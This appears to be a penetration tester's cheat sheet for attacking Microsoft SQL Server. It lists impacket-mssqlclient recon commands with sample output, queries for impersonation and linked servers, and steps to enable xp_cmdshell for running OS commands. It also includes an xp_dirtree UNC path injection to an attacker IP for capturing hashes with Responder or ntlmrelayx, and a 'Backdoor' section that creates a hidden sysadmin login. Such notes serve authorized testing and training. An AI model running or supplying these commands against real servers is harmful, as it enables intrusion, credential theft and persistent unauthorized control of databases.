MSSQL
General
- Guest Authentication can be allowed. If so, check if you can impersonate other users.
- Look for linked servers, the user you can login as might be different. Also you may be able to impersonate someone else there
- If you’re on a windows server, look for inetpub config files
Impacket-MSSQL
# authentication via windows auth
impacket-mssqlclient LAB/myuser:mypass123@sql.lab.local -windows-auth
# mssqlclient recon
enum_links
enum_logins
enum_impersonateHelper
proxychains4 -q impacket-mssqlclient LAB/myuser:mypass123@sql.lab.local -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'master'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (110 2789)
[!] Press help for extra shell commands
SQL (LAB\myuser dbo@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask querySQL Commands
# Current login name - ie. the user you're logged in as
# if you are using windows auth, this should be something like LAB\user
SELECT SYSTEM_USER;
# The database user (gives you an idea of the permissions your authed user has)
SELECT USER;
# list databases
SELECT name FROM master..sysdatabases;
# list linked servers
EXEC sp_linkedservers;
# list logins available for impersonation
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
# check if XP_CMDSHELL is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# enable XP_CMDSHELL
# requires privileges
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
EXEC xp_cmdshell 'whoami'
# UNC Path injection - capture with responder, smbserver, ntmrelayx or equivalent
EXEC master..xp_dirtree '\\10.10.10.10\share\test.txt';SQL Commands: Backdoor
Make new database login (username TESTUSER, password L0ngP4ss123), map it to the db_owner and assign the sysadmin role:
CREATE LOGIN [TESTUSER] WITH PASSWORD=N'L0ngP4ss123!';
CREATE USER [TESTUSER] FOR LOGIN [TESTUSER];
ALTER ROLE [db_owner] ADD MEMBER [TESTUSER];
EXEC master..sp_addrolemember @rolename=N'db_owner', @membername=N'TESTUSER';
EXEC master..sp_addsrvrolemember @rolename=N'sysadmin', @loginame=N'TESTUSER';
EXEC master..sp_addremotelogin 'SQLSRV01\SQLEXPRESS', 'TESTUSER';References and tools
- https://ppn.snovvcrash.rocks/pentest/infrastructure/dbms/mssql
- https://github.com/lefayjey/SharpSQLPwn
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://watchdogsacademy.gitbook.io/attacking-active-directory/mssql-servers-exploitation/mssql-trusted-links
- https://github.com/quentinhardy/msdat